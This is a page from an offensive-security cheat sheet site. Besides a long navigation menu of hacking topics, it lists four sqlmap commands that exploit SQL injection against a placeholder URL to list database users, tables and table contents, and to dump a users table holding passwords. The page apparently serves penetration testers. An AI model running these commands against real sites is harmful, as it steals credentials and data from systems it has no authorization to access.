🕺
🕺
🕺
🕺
CheatSheets
Search
⌃K
Introduction
Getting Started With Hacking
VMs on Mac
Windows
Enumeration
Local Privilege Escalation
UAC Bypasses
Persistance
Networking
Active Directory
Offensive Powershell
Enumeration
Lateral Movement
Escalation
Persistance
Mimikatz
Alternate Cred Dumps
MSSQL
Defences and Bypasses
Setting Up a Lab
Red Teaming
Phishing Payloads
Cobalt Strike
Metasploit
Linux
Networking
Enumeration
Local Privilege Escalation
Persistance
MySQL
Mainframes
HP Nonstop
IBM z/OS
Cloud
AWS
GCP
Azure
Web App
Tomcat
SQLMap
PHP
Mobile
Android
iOS
Exploit-Dev
Linux
Shellcode
Windows
WiFi
Alfa AWUS036ACH Setup
Aircrack-ng
Powered By
GitBook
SQLMap
Users
sqlmap -u http://URL/page.php?id=3 --users
Passwords
sqlmap -u http://URL/page.php?id=3 -dump -T users
Tables
sqlmap -u http://URL/page.php?id=3 --tables
# Dump Info
sqlmap -u http://URL/page.php?id=3 -D <DATABASE> -T <TABLE> --dump
Web App - Previous
Tomcat
Next - Web App
PHP
Last modified
2yr ago